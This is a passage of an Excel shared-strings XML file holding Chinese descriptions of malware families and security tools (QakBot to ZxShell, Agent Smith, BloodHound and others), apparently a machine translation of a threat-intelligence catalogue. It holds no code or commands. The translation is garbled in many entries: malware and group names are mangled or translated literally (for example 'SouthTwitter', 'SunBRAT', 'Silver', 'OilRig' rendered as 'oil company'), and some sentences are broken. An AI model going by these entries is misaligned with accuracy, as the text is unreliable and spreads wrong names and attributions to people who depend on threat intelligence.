    <t>QakBot是一种模块化银行特洛伊木马，至少自2007年以来，主要由出于财务动机的参与者使用。QakBot不断得到维护和开发，已经从一个信息窃取者演变为勒索软件的交付代理，最著名的是ProLock和Egregor。</t>
  </si>
  <si>
    <t>QUADAGENT是OilRig使用的PowerShell后门。</t>
  </si>
  <si>
    <t>QuasarRAT是一种开源远程访问工具，在GitHub上公开提供。QuasarRAT是用C#语言开发的。</t>
  </si>
  <si>
    <t>Ragnar Locker是一款勒索软件，至少从2019年12月开始使用。</t>
  </si>
  <si>
    <t>RainyDay是Naikon至少从2020年开始使用的后门工具。</t>
  </si>
  <si>
    <t>Ramsay是一个窃取信息的恶意软件框架，旨在收集和过滤敏感文件，包括来自气隙系统的文件。研究人员已经发现拉姆齐和Darkhotel相关的Retro恶意软件之间存在重叠。</t>
  </si>
  <si>
    <t>RARSTONE是Naikon集团使用的恶意软件，具有与PlugX类似的一些特征。</t>
  </si>
  <si>
    <t>RATANKBA是Lazarus Group使用的远程控制器工具。RATANKBA曾被用于攻击波兰、墨西哥、乌拉圭、英国和智利的金融机构。它还被用来对付与电信、管理咨询、信息技术、保险、航空和教育有关的组织。RATANKBA有一个图形用户界面，允许攻击者发布作业，以便在受感染的机器上执行。</t>
  </si>
  <si>
    <t>RawDisk是EldoS公司提供的合法商业驱动程序，用于与文件、磁盘和分区进行交互。该驱动程序允许直接修改本地计算机硬盘上的数据。在某些情况下，该工具可以通过用户模式进程执行这些原始磁盘修改，从而绕过Windows操作系统的安全功能。</t>
  </si>
  <si>
    <t>RawPOS是一个销售点（POS）恶意软件家族，用于搜索受害者的持卡人数据。它至少从2008年开始使用。FireEye将RawPOS分为三个部分：恶魔之声、杜布雷和浮木。</t>
  </si>
  <si>
    <t>RCSAndroid是安卓恶意软件。</t>
  </si>
  <si>
    <t>RDAT是被怀疑是伊朗威胁组织OilRig使用的后门。RDAT最初于2017年确定，目标是电信行业的公司。</t>
  </si>
  <si>
    <t>RDFSNIFFER是BOOSTWRITE加载的一个模块，它允许攻击者监视和篡改通过应用程序建立的合法连接，该应用程序旨在为远程IT技术人员提供可见性和系统管理功能。</t>
  </si>
  <si>
    <t>Reaver是一个恶意软件家族，至少自2016年底以来一直处于野生状态。报道显示，受害者主要与“五毒”有关，中国政府认为这是一种危险的行为。这种类型的恶意软件非常罕见，因为其最终有效载荷是以控制面板项目的形式存在的。</t>
  </si>
  <si>
    <t>Red Alert 2.0是一种伪装成VPN客户端的银行特洛伊木马程序。</t>
  </si>
  <si>
    <t>RedDrop是一个Android恶意软件家族，可以从设备中过滤敏感数据。</t>
  </si>
  <si>
    <t>RedLeaves是menuPass使用的恶意软件家族。该代码与PlugX重叠，可能基于开源工具Trochilus。</t>
  </si>
  <si>
    <t>Reg是一个用于与Windows注册表交互的Windows实用程序。它可以在命令行界面上用于查询、添加、修改和删除信息。</t>
  </si>
  <si>
    <t>RegDuke是一种用英文写成的第一阶段植入物。至少自2017年起由APT29使用。当机器上的其他植入物失去控制时，RegDuke被用来控制一台受损的机器。</t>
  </si>
  <si>
    <t>Regin是一个恶意软件平台，针对电信、政府和金融机构等多个行业的受害者。一些Regin时间戳可以追溯到2003年。</t>
  </si>
  <si>
    <t>Remcos是一种封闭源代码工具，由一家名为Breaking Security的公司作为远程控制和监视软件进行销售。据观察，Remcos被用于恶意软件活动。</t>
  </si>
  <si>
    <t>Remexi是一种基于Windows的特洛伊木马，是用C编程语言开发的。</t>
  </si>
  <si>
    <t>RemoteCMD是APT3使用的自定义工具，用于在远程系统上执行命令，类似于SysInternal的PSEXEC功能。</t>
  </si>
  <si>
    <t>RealTeValtuals&gt;是一个合法的远程管理工具，它被MyDyWaWy使用，至少2021用于目标机器上的执行。</t>
  </si>
  <si>
    <t>Remsec是Strider使用的模块化后门，似乎主要用于间谍目的。它的许多模块都是用Lua编写的。</t>
  </si>
  <si>
    <t>Responder是一个开源工具，用于LLMNR、NBT-NS和MDNS中毒，内置HTTP/SMB/MSSQL/FTP/LDAP rogue身份验证服务器，支持NTLMv1/NTLMv2/LMv2、扩展安全NTLMSSP和基本HTTP身份验证。</t>
  </si>
  <si>
    <t>REvil是一个勒索软件家族，与GOLD SOUTHFIELD集团有关联，至少从2019年4月起作为勒索软件即服务（RaaS）运营。REvil是高度可配置的，与GandCrab RaaS有代码相似之处。</t>
  </si>
  <si>
    <t>RGEVEL是一个恶意的Internet信息服务（IIS）后门，用C++语言开发的。RGDoor已部署在属于中东政府组织的Web服务器上。RGDoor提供对受损IIS服务器的后门访问。</t>
  </si>
  <si>
    <t>Rifdoor是一种远程访问特洛伊木马（RAT），与HotCroissant有许多代码相似之处。</t>
  </si>
  <si>
    <t>Riltok是一种利用钓鱼弹出窗口收集用户凭据的银行恶意软件。</t>
  </si>
  <si>
    <t>RobbinHood是一种勒索软件，最初被观察到用于攻击巴尔的摩市政府的计算机网络。</t>
  </si>
  <si>
    <t>ROCKBOOT是一个引导套件，被一个身份不明、疑似中国的组织使用。</t>
  </si>
  <si>
    <t>RogueRobin是DarkHydrus使用的一种有效载荷，已在PowerShell和C#中开发。</t>
  </si>
  <si>
    <t>ROKRAT是APT37使用的基于云的远程访问工具（RAT）。该软件已被用于针对韩国的受害者。APT37在2016年至2018年的几次活动中使用了ROKRAT。</t>
  </si>
  <si>
    <t>Rotexy是安卓银行恶意软件，经过几年的演变。它最初是2014年10月首次发现的一个短信间谍软件特洛伊木马，自那以后，它已演变为包含更多功能，包括勒索软件功能。</t>
  </si>
  <si>
    <t>RTM是用Delphi编写的自定义恶意软件。它由同名组（RTM）使用。新版本的恶意软件被公开称为Redaman。</t>
  </si>
  <si>
    <t>RunningRAT是一款远程访问工具，与金龙和勇敢王子一起出现在2018年平昌冬奥会的周边运营中。</t>
  </si>
  <si>
    <t>Ryuk是一款勒索软件，旨在针对至少自2018年以来就被用于攻击的企业环境。Ryuk与Hermes勒索软件的代码相似。</t>
  </si>
  <si>
    <t>S-Type是2013年至2014年沙尘暴使用的后门。</t>
  </si>
  <si>
    <t>Sakula是一种远程访问工具（RAT），2012年首次出现，并在2015年用于入侵。</t>
  </si>
  <si>
    <t>SamSam是2016年初出现的勒索软件。与某些勒索软件不同，它的变种要求操作员手动与恶意软件交互，以执行其一些核心组件。</t>
  </si>
  <si>
    <t>schtasks用于计划Windows系统上的程序或脚本在特定日期和时间运行。</t>
  </si>
  <si>
    <t>SDBbot是一个后门，带有安装程序和加载程序组件，TA505至少从2019年开始使用这些组件。</t>
  </si>
  <si>
    <t>SDelete是一个应用程序，它以一种不可恢复的方式安全地删除数据。它是Microsoft Sysinternals工具套件的一部分。</t>
  </si>
  <si>
    <t>SeaDuke是APT29在2014年至2015年间使用的恶意软件。它主要被用作已经被CozyCar入侵的受害者的第二个后门。</t>
  </si>
  <si>
    <t>Seasalt是一种与APT1 2010年运营相关的恶意软件。它与OceanSalt有一些代码相似之处。</t>
  </si>
  <si>
    <t>SEASHARPEE是一种用于石油钻井平台的网状外壳。</t>
  </si>
  <si>
    <t>ServHelper是2018年末首次观察到的后门。后门是用Delphi编写的，通常作为DLL文件交付。</t>
  </si>
  <si>
    <t>ShadowPad是一款模块化后门，于2017年7月中旬在NetSarang软件的一次供应链妥协中首次发现。该恶意软件最初被认为仅由APT41使用，但后来被观察到被多个中国威胁活动组织使用。</t>
  </si>
  <si>
    <t>Shamoon是2012年伊朗“正义之剑”组织首次使用的恶意软件。2016年和2018年观察到了其他版本的Shamoon 2和Shamoon 3。Shamoon还可以利用RawDisk和Filerase执行数据擦除任务。Shamoon一词有时用来指使用恶意软件的群体以及恶意软件本身。</t>
  </si>
  <si>
    <t>SharpStage是一个。具有后门功能的NET恶意软件。</t>
  </si>
  <si>
    <t>SHARPSTATS是一个。MuddyWater至少从2019年开始使用净后门。</t>
  </si>
  <si>
    <t>ShiftyBug是一个针对Android的自动植根恶意软件系列。这个家族与其他安卓家族非常相似，比如Shedun、Shuanet、Kemoge，不过人们并不认为所有家族都是由同一个群体创建的。</t>
  </si>
  <si>
    <t>ShimRatReporter是中国可疑对手莫方用来自动进行初步发现的工具。这一发现的细节用于定制后续有效载荷（如ShimRat），以及建立模拟对手目标的人造基础设施。ShimRatReporter已被用于针对多个国家和部门的活动，包括政府、军事、关键基础设施、汽车和武器开发。</t>
  </si>
  <si>
    <t>SHIPSHAPE是由APT30开发的恶意软件，允许通过可移动设备传播和过滤数据。APT30可以使用此功能跨气隙过滤数据。</t>
  </si>
  <si>
    <t>SHOTPUT是APT3使用的自定义后门。</t>
  </si>
  <si>
    <t>SHUTTERSPEED是APT37使用的后门。</t>
  </si>
  <si>
    <t>Sibot是用VBScript编写的双用途恶意软件，旨在在受损系统上实现持久性，以及下载和执行额外的有效载荷。2021年初，微软在对APT29和SalARWORE网络入侵的调查中发现了三个SiBOT变体。</t>
  </si>
  <si>
    <t>SouthTwitter是一种基于C的后门，已经被石油公司至少使用了2021。</t>
  </si>
  <si>
    <t>SilkBean是一款安卓监控软件，包含全面的远程访问工具（RAT）功能，用于针对维吾尔族。</t>
  </si>
  <si>
    <t>Siloscape是通过Windows容器以Kubernetes群集为目标的恶意软件。在2021年3月首次观测到青贮。</t>
  </si>
  <si>
    <t>SimBad是Google Play Store上的一款广告软件，通过RXDroider软件开发工具包分发。“SimBad”这个名字源于这样一个事实，即大多数受感染的应用程序都是模拟游戏。该广告软件由开源框架解析服务器的一个实例控制。</t>
  </si>
  <si>
    <t>Skeleton Key是一种恶意软件，用于向域控制器中注入虚假凭据，以创建后门密码。类似于骨架键的功能作为模块包含在Mimikatz中。</t>
  </si>
  <si>
    <t>Skidmap是用于加密货币挖掘的内核模式rootkit。</t>
  </si>
  <si>
    <t>Skygofree是安卓间谍软件，据信已于2014年开发，至少在2017年使用。</t>
  </si>
  <si>
    <t>Silver是一个开源的、跨平台的、用Golang编写的红色团队指挥和控制框架。</t>
  </si>
  <si>
    <t>SLOWDRIFT是APT37针对韩国学术和战略受害者使用的后门。</t>
  </si>
  <si>
    <t>Smoke Loader是一种恶意机器人应用程序，可用于加载其他恶意软件。Smoke Loader至少从2011年开始在野外出现，包括许多不同的有效载荷。它因使用欺骗和自我保护而臭名昭著。它还附带了几个插件。</t>
  </si>
  <si>
    <t>SMOKEDHAM是基于Powershell的。2021年5月首次报道的网络后门；至少有一家勒索软件即服务分支机构使用过它。</t>
  </si>
  <si>
    <t>SNUGRIDE是menuPass用作第一阶段恶意软件的后门。</t>
  </si>
  <si>
    <t>Socksbot是滥用套接字安全（SOCKS）代理的后门。</t>
  </si>
  <si>
    <t>SodaMaster是一种无文件恶意软件，menuPass至少从2020年开始使用它下载和执行有效载荷。</t>
  </si>
  <si>
    <t>SunBRAT是一个模块化后门，用C++编写，至少在2019使用过。SombRAT已被用于下载和执行恶意有效载荷，包括FIVEHANDS勒索软件。</t>
  </si>
  <si>
    <t>SoreFang是APT29用于过滤和加载其他恶意软件的第一级下载程序。</t>
  </si>
  <si>
    <t>SOUNDBITE是APT32使用的标志性后门。</t>
  </si>
  <si>
    <t>SPACESHIP是由APT30开发的恶意软件，允许通过可移动设备传播和过滤数据。APT30可以使用此功能跨气隙过滤数据。</t>
  </si>
  <si>
    <t>Spark是Windows后门，早在2017年就开始使用。</t>
  </si>
  <si>
    <t>SpeakUp是一种特洛伊木马后门程序，针对Linux和OSX设备。首次观测是在2019年1月。</t>
  </si>
  <si>
    <t>SpicyOmelete是一款基于JavaScript的远程访问工具，Cobalt Group至少从2018年开始使用该工具。</t>
  </si>
  <si>
    <t>spwebmember是一个Microsoft SharePoint枚举和数据转储工具，用英文编写。网</t>
  </si>
  <si>
    <t>Spydaler是一种安卓恶意软件，可以从安卓设备中过滤敏感数据。</t>
  </si>
  <si>
    <t>SpyNote RAT（远程访问特洛伊木马）是一系列恶意Android应用程序。SpyNote RAT builder工具可用于开发具有恶意软件功能的恶意应用程序。</t>
  </si>
  <si>
    <t>sqlmap是一个开源渗透测试工具，可用于自动化检测和利用SQL注入缺陷的过程。</t>
  </si>
  <si>
    <t>SQLRat是一种恶意软件，它执行SQL脚本以避免留下传统的主机工件。已经观察到FIN7在使用它。</t>
  </si>
  <si>
    <t>SslMM是Naikon使用的功能齐全的后门，有多种变体。</t>
  </si>
  <si>
    <t>Starloader是一个装载Felismus和相关工具的装载组件。</t>
  </si>
  <si>
    <t>StoneDrill是在与APT33相关的针对中东和欧洲目标的破坏性活动中发现的恶意软件。</t>
  </si>
  <si>
    <t>StreamEx是一个恶意软件家族，Deep Panda至少从2015年开始使用它。2016年，它通过合法的韩国网站分发。</t>
  </si>
  <si>
    <t>StrongPatient是PROMETHIUM使用的一种窃取信息的恶意软件。</t>
  </si>
  <si>
    <t>Stuxnet是第一个公开报道的专门针对工业控制系统设备的恶意软件。Stuxnet是一个庞大而复杂的恶意软件，它利用了多种不同的行为，包括多个零日漏洞、复杂的Windows rootkit和网络感染例程。Stuxnet于2010年被发现，一些组件早在2008年11月就开始使用。</t>
  </si>
  <si>
    <t>SUNBURST是一个特洛伊木马化的DLL，旨在适应SolarWinds Orion软件更新框架。至少从2020年2月起，APT29就开始使用它。</t>
  </si>
  <si>
    <t>SUNSPOT是一种植入物，它将SUNBURST后门注入SolarWinds Orion软件更新框架。至少从2020年2月起，APT29就开始使用它。</t>
  </si>
  <si>
    <t>SUPERNOVA是一个内存中的网络外壳。净C#。它是在2020年11月对APT29的SolarWinds网络操作进行调查时发现的，但被确定为无关。随后的分析表明，超新星可能被总部位于中国的威胁组织“螺旋”利用。</t>
  </si>
  <si>
    <t>Sykipot是一种恶意软件，自大约2007年以来，它一直被用于针对美国受害者的网络钓鱼活动。Sykipot的一个变种劫持了受害者的智能卡。使用该恶意软件的组织也被称为Sykipot。</t>
  </si>
  <si>
    <t>SynAck是特洛伊勒索软件的变种，至少自2017年秋季以来，它主要针对讲英语的用户。</t>
  </si>
  <si>
    <t>SYNful Knock是对网络设备操作系统的一种隐形修改，可用于在受害者的网络中保持持久性，并为对手提供新功能。</t>
  </si>
  <si>
    <t>Sys10是Naikon在2013年全年使用的后门。</t>
  </si>
  <si>
    <t>SYSCON是一个后门，至少从2017年开始使用，并与涉及朝鲜主题的活动有关。SYSCON由CARROTBALL和CARROTBAT滴管提供。</t>
  </si>
  <si>
    <t>Systeminfo是一个Windows实用程序，可用于收集有关计算机的详细信息。</t>
  </si>
  <si>
    <t>T9000是T5000恶意软件家族（也称为Plat1）的一个较新变体。它的主要功能是收集受害者的信息。它已被用于针对美国组织的多个目标攻击。</t>
  </si>
  <si>
    <t>Taidoor是一种远程访问特洛伊木马（RAT），中国政府网络参与者使用它来维持对受害者网络的访问。至少自2010年以来，台门主要用于对付台湾政府组织。</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE是一种功能齐全的信标植入物，与Lazarus Group使用的指挥模块集成。这是2020年5月首次报道的。</t>
  </si>
  <si>
    <t>TajMahal是一个多功能间谍框架，至少从2014年开始使用。TajMahal由两个独立的包组成，分别名为Tokyo和Yokohama，最多可以部署80个插件。</t>
  </si>
  <si>
    <t>Tangelo是iOS恶意软件，据信与隐形芒果安卓恶意软件来自同一个开发者。它不是一个移动应用程序，而是一个Debian软件包，只能在越狱的iOS设备上运行。</t>
  </si>
  <si>
    <t>Tasklist实用程序显示本地或远程计算机上运行的所有任务的应用程序和服务列表及其进程ID（PID）。它与Windows操作系统一起打包，可以从命令行界面执行。</t>
  </si>
  <si>
    <t>TDTESS是64位的。抄袭者使用的NET二进制后门。</t>
  </si>
  <si>
    <t>TEARDROP是一种仅存储的滴管，在与2020年SolarWinds网络入侵相关的调查中，在一些受害者机器上发现了这种滴管。APT29可能至少从2020年5月起就开始使用它。</t>
  </si>
  <si>
    <t>TERRACOTTA是一个广告欺诈僵尸网络，每周能够生成超过20亿个欺诈请求。</t>
  </si>
  <si>
    <t>TEXTMATE是驻留内存的第二级PowerShell后门。2017年2月，观察到它与电源一起使用。</t>
  </si>
  <si>
    <t>ThiefQuest是一种病毒、数据窃取者和雨刷器，以针对macOS系统的勒索软件的形式出现。ThiefQuest最早出现在2020年，它是通过共享torrent链接的俄罗斯论坛上流行的macOS软件的特洛伊木马盗版版本发布的。尽管ThiefQuest以勒索软件的形式出现，但由于动态生成的加密密钥从未发送给攻击者，因此可以更恰当地将其视为恶意软件的一种形式。</t>
  </si>
  <si>
    <t>Tiktok Pro是伪装成Tiktok应用程序的间谍软件。</t>
  </si>
  <si>
    <t>TINYTYPHON是一个后门，负责季风运动的参与者一直在使用它。据报道，它的大部分代码取自MyDoom蠕虫。</t>
  </si>
  <si>
    <t>Tinzbot是一个用C#编写的机器人，由Cleaver开发。</t>
  </si>
  <si>
    <t>Tor是一个软件套件和网络，在互联网上提供更高的匿名性。它创建了一个多跳代理网络，并利用多层加密来保护消息和路由信息。Tor使用“洋葱路由”，消息通过多层加密进行加密；在代理网络中的每一步，最顶层都会被解密，内容会转发到下一个节点，直到到达目的地。</t>
  </si>
  <si>
    <t>Triada于2016年首次被报告为第二阶段恶意软件。2019年发布的更高版本采用了新技术，并作为其他特洛伊木马应用程序的初始下载程序。</t>
  </si>
  <si>
    <t>ToopBoT是一个用C++编写的木马间谍软件程序，它在2016年9月首次出现，成为了DyRe的一个可能的继承者。TrickBot最初由Wizard Spider开发并用于瞄准北美、澳大利亚和整个欧洲的银行网站；此后，作为“大型狩猎”勒索软件活动的一部分，它被用于打击全球所有行业。</t>
  </si>
  <si>
    <t>TrickMo是一个2FA绕过手机银行特洛伊木马程序，很可能是由TrickBot发布的。TrickMo主要针对德国的用户。</t>
  </si>
  <si>
    <t>Truvasys是PROMETHIUM使用的第一阶段恶意软件。它是用Delphi编程语言编写的模块集合。</t>
  </si>
  <si>
    <t>TSCookie是一种远程访问工具（RAT），BlackTech曾在针对日本目标的战役中使用该工具。。TSCookie被称为“辩护”，尽管最近的报道表明两者之间存在分离。</t>
  </si>
  <si>
    <t>Turian是一个后门，被后门外交用来针对非洲、欧洲、中东和亚洲的外交部、电信公司和慈善机构。第一次报道在2021，Turiangi可能与QuaRin有关，这是一个古老的后门，上次在叙利亚和美国被用来反对外交目标2013。</t>
  </si>
  <si>
    <t>TURNEDUP是一个非公开的后门。它已被APT33的StoneDrill恶意软件删除。</t>
  </si>
  <si>
    <t>Twitoor是一个dropper应用程序，能够从社交媒体接收命令。</t>
  </si>
  <si>
    <t>TYPEFRAME是Lazarus Group使用的远程访问工具。</t>
  </si>
  <si>
    <t>UACMe是一个开源评估工具，它包含许多绕过Windows用户帐户控制的方法，可用于在多个版本的操作系统上进行评估。</t>
  </si>
  <si>
    <t>UBoatRAT是2017年5月确定的远程访问工具。</t>
  </si>
  <si>
    <t>一个Linux rootkit，提供后门访问并对防御者隐藏。</t>
  </si>
  <si>
    <t>UPPERCUT是menuPass使用的后门。</t>
  </si>
  <si>
    <t>Uroburos是Turla使用的rootkit。</t>
  </si>
  <si>
    <t>Ursnif是一种银行特洛伊木马，是Gozi恶意软件的变种，通过各种自动攻击工具包、网络钓鱼附件和恶意链接传播。URSNF主要与数据盗窃有关，但其变体还包括具有多种行为的组件（后门、间谍软件、文件注入程序等）。</t>
  </si>
  <si>
    <t>USBferry是一种窃取信息的恶意软件，热带骑兵曾使用它对台湾和菲律宾空旷的军事环境进行有针对性的攻击。USBferry与YAHOYAH共享一个重叠的代码库，尽管它有几个特性，使其成为一个独特的恶意软件。</t>
  </si>
  <si>
    <t>USBStealer是一种恶意软件，至少自2005年以来，APT28就一直在使用它来从空气间隙网络中提取信息。它不具备通过互联网进行通信的能力，已与ADVSTORESHELL结合使用。</t>
  </si>
  <si>
    <t>Valak是一种多阶段模块化恶意软件，可以作为独立的信息窃取程序或下载程序，首次在2019年针对美国和德国的企业发现。</t>
  </si>
  <si>
    <t>Valrase*是一个贝壳码下载器，它被APT29的使用至少2021。</t>
  </si>
  <si>
    <t>Vasport是Elderwood使用的特洛伊木马，用于在受损主机上打开后门。</t>
  </si>
  <si>
    <t>VBShower是一个后门，至少从2019年开始被Inception使用。VBShower已被用作第二阶段有效载荷的下载程序，包括PowerShower。</t>
  </si>
  <si>
    <t>ViceLeaker是一个间谍软件框架，能够进行广泛的监视和数据过滤操作，主要针对以色列公民的设备。</t>
  </si>
  <si>
    <t>ViperRAT是一款先进的监控软件，至少从2015年开始投入使用，用于打击以色列国防军。</t>
  </si>
  <si>
    <t>Volgmer是一种后门特洛伊木马，旨在提供对受损系统的秘密访问。至少从2013年起，它就被用于针对政府、金融、汽车和媒体行业。它的主要传递机制被怀疑是网络钓鱼。</t>
  </si>
  <si>
    <t>WannaCry是一种勒索软件，最早出现在2017年5月的一次全球攻击中，该攻击波及150多个国家。它包含类似蠕虫的功能，可以使用SMBv1漏洞EternalBlue在计算机网络中传播。</t>
  </si>
  <si>
    <t>WastedLocker是Indrik Spider的勒索软件家族，至少从2020年5月开始使用。WastedLocker被广泛用于各种行业，包括制造业、信息技术和媒体。</t>
  </si>
  <si>
    <t>Waterbear是BlackTech的模块化恶意软件，主要用于横向移动、解密和触发有效载荷，能够隐藏网络行为。</t>
  </si>
  <si>
    <t>WEBC2是APT1早在2006年7月就使用的一系列后门恶意软件。WEBC2后门设计用于从预定的C2服务器检索网页，其命令隐藏在HTML注释或特殊标记中。</t>
  </si>
  <si>
    <t>WellMail是一个轻量级恶意软件，由APT29使用Golang编写，在设计和结构上与WellMess类似。</t>
  </si>
  <si>
    <t>WellMess是一个轻量级恶意软件家族，其变种以。NET和Golang，APT29至少从2018年开始使用。</t>
  </si>
  <si>
    <t>Wevtutil是一个Windows命令行实用程序，允许管理员检索有关事件日志和发布者的信息。</t>
  </si>
  <si>
    <t>Wiarp是一种特洛伊木马，Elderwood使用它在受损主机上打开后门。</t>
  </si>
  <si>
    <t>Windows凭据编辑器是一个密码转储工具。</t>
  </si>
  <si>
    <t>WindTail是Windshift使用的macOS监视植入物。WindTail与Hack Back又名KitM OSX有代码相似之处。</t>
  </si>
  <si>
    <t>WINERACK是APT37使用的后门。</t>
  </si>
  <si>
    <t>Winexe是一个轻量级的开源工具，类似于PsExec，旨在允许系统管理员在远程服务器上执行命令。Winexe的独特之处在于它是一个基于GNU/Linux的客户端。</t>
  </si>
  <si>
    <t>Wingbird是一个后门，似乎是商业软件FinFisher的一个版本。据报道，它被用来攻击个人电脑，而不是网络。钕在2016年5月的一次活动中使用了它。</t>
  </si>
  <si>
    <t>WinMM是Naikon使用的功能齐全、简单的后门。</t>
  </si>
  <si>
    <t>Winnti for Linux是一种特洛伊木马，至少从2015年开始出现，专门针对Linux系统设计。报告显示，winnti恶意软件家族在包括winnti Group在内的多个参与者之间共享。Windows变体在Winnti for Windows下单独跟踪。</t>
  </si>
  <si>
    <t>Winnti for Windows是一种特洛伊木马，至少从2010年到2016年，多个组织使用它在不同地区进行入侵。使用该恶意软件的其中一个组被称为Winnti Group；然而，报告显示，第二个不同的组Axiom也使用了该恶意软件。Linux变体在Winnti for Linux下单独跟踪。</t>
  </si>
  <si>
    <t>WireLourger是一个macOS恶意软件家族，其目标是通过USB连接的iOS设备。</t>
  </si>
  <si>
    <t>WolfRAT是基于Dendroid泄露版本的恶意软件，该版本主要针对泰国用户。沃尔夫拉特很可能是由现已不复存在的沃尔夫研究组织运营的。</t>
  </si>
  <si>
    <t>XAgentOSX是一种特洛伊木马，已被OS X上的APT28使用，似乎是其标准筷子或XAgent特洛伊木马的端口。</t>
  </si>
  <si>
    <t>Xbash是一个针对Linux和Microsoft Windows服务器的恶意软件家族。该恶意软件与铁人集团（Iron Group）有关，铁人集团是一个以之前勒索软件攻击而闻名的威胁行为人集团。Xbash是用Python开发的，然后使用PyInstaller将其转换为一个独立的Linux ELF可执行文件。</t>
  </si>
  <si>
    <t>Xbot是一个安卓恶意软件家族，2016年主要针对俄罗斯和澳大利亚的安卓用户。</t>
  </si>
  <si>
    <t>xCaon是BoxCaon恶意软件家族的HTTP变体，IndigoZebra至少从2014年开始使用它。xCaon已被用于针对中亚的政治实体，包括吉尔吉斯斯坦和乌兹别克斯坦。</t>
  </si>
  <si>
    <t>xCmd是一个开源工具，类似于PsExec，允许用户在远程系统上执行应用程序。</t>
  </si>
  <si>
    <t>XcodeGhost是一种iOS恶意软件，2015年至少感染了39个iOS应用程序，并可能影响数百万用户。</t>
  </si>
  <si>
    <t>XCSSET是macOS模块化后门，面向Xcode应用程序开发人员。XCSSET于2020年8月首次被观测到，并已被用于安装后门组件、修改浏览器应用程序、进行收集，以及提供类似勒索软件的加密功能。</t>
  </si>
  <si>
    <t>Android的XLoover是一个恶意的Android应用程序，首先是针对日本、韩国、中国、台湾和香港的2018。最近有人观察到，它将韩国用户视为色情应用。它与iOS的XLoader分开跟踪。</t>
  </si>
  <si>
    <t>XLoader for iOS是一个恶意的iOS应用程序，能够收集系统信息。它与Android的XLoader是分开追踪的。</t>
  </si>
  <si>
    <t>Xtennel是一种类似VPN的网络代理工具，可以在C2服务器和受害者之间中继流量。它首次出现在2013年5月，据报道在民主党全国委员会妥协期间被APT28使用。</t>
  </si>
  <si>
    <t>YAHOYAH是一个特洛伊木马程序，被Tropic Trooper用作第二级后门。</t>
  </si>
  <si>
    <t>yty是一个基于插件的模块化恶意软件框架。框架的组件是用多种编程语言编写的。</t>
  </si>
  <si>
    <t>Zebrocy是一种特洛伊木马，至少从2015年11月起被APT28使用。恶意软件有多种编程语言变体，包括C++、Delphi、AutoIt、Cype、VB。NET和Golang。</t>
  </si>
  <si>
    <t>Zen是2013年首次出现的安卓恶意软件。</t>
  </si>
  <si>
    <t>ZergHelper是一款独特的iOS riskware，因为它明显规避了苹果应用商店的审查流程。应用中未发现恶意功能，但存在安全风险。</t>
  </si>
  <si>
    <t>Zeroaccess是一个内核模式的Rootkit，它试图将受害者添加到Zeroaccess僵尸网络中，通常是为了金钱利益。</t>
  </si>
  <si>
    <t>ZeroT是TA459使用的特洛伊木马，通常与PlugX结合使用。</t>
  </si>
  <si>
    <t>Zeus Panda是一种特洛伊木马，旨在窃取银行信息和其他敏感凭证进行过滤。Zeus Panda的原始源代码于2011年泄露，使威胁参与者可以使用其源代码作为新恶意软件变体的基础。它主要用于从Windows XP到Windows 10的Windows操作系统。</t>
  </si>
  <si>
    <t>ZLib是一款功能齐全的后门，2014年至2015年被沙尘暴用作第二阶段植入物。它是恶意软件，不应与其名称来源的压缩库混淆。</t>
  </si>
  <si>
    <t>zwShell是一个用Delphi编写的远程访问工具（RAT），夜龙已经使用过。</t>
  </si>
  <si>
    <t>ZxShell是一个远程管理工具和后门，可以从互联网上下载，尤其是从中国黑客网站上下载。至少从2004年开始使用。</t>
  </si>
  <si>
    <t>SLuthFultMeLi是一个用C++编写的远程访问木马，它至少在2017年1月被一个身份不明的“复杂的网络演员”所使用。它已被用于针对俄罗斯、印度、哈萨克斯坦、吉尔吉斯斯坦、马来西亚、乌克兰和东欧的政府组织、国防承包商、大学和能源公司。</t>
  </si>
  <si>
    <t>Agent Smith</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Agent Smith是一种移动恶意软件，通过用包含欺诈广告的恶意版本替换设备上的合法应用程序来获取经济利益。截至2019年7月，代理Smith已感染约2500万台设备，主要针对印度，但在其他亚洲国家以及沙特阿拉伯、英国和美国也观察到了影响。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Agent Tesla</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Agent Tesla是一个间谍软件特洛伊木马，专为。NET框架，至少从2014年起就已被观察到。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Agent.btz</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Agent.btz是一种蠕虫，主要通过USB驱动器等可移动设备传播。据报道，它在2008年感染了美国军事网络。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Avenger</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Avenger是一种下载工具，至少从2019年开始被青铜管家使用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Backdoor.Oldrea是蜻蜓使用的后门。它似乎是该组或专门为其编写的自定义恶意软件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BADNEWS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BADNEWS指的是那些负责拼凑活动的演员使用的恶意软件。它之所以得名，是因为它使用RSS源、论坛和博客进行命令和控制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bandook</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bandook是一个商业上可用的大鼠，用Delphi和C++编写，至少有2007个可用。它已被用于打击美国、南美、欧洲和东南亚的政府、金融、能源、医疗保健、教育、It和法律组织。Bandook已经被Dark Caracal使用，也被称为“Manul行动”的另一场战役使用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BISCUIT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BISCUIT是APT1早在2007年就开始使用的后门。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BloodHound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BloodHound是一种Active Directory（AD）侦察工具，可以揭示隐藏的关系，并识别AD环境中的攻击路径。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BLUELIGHT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
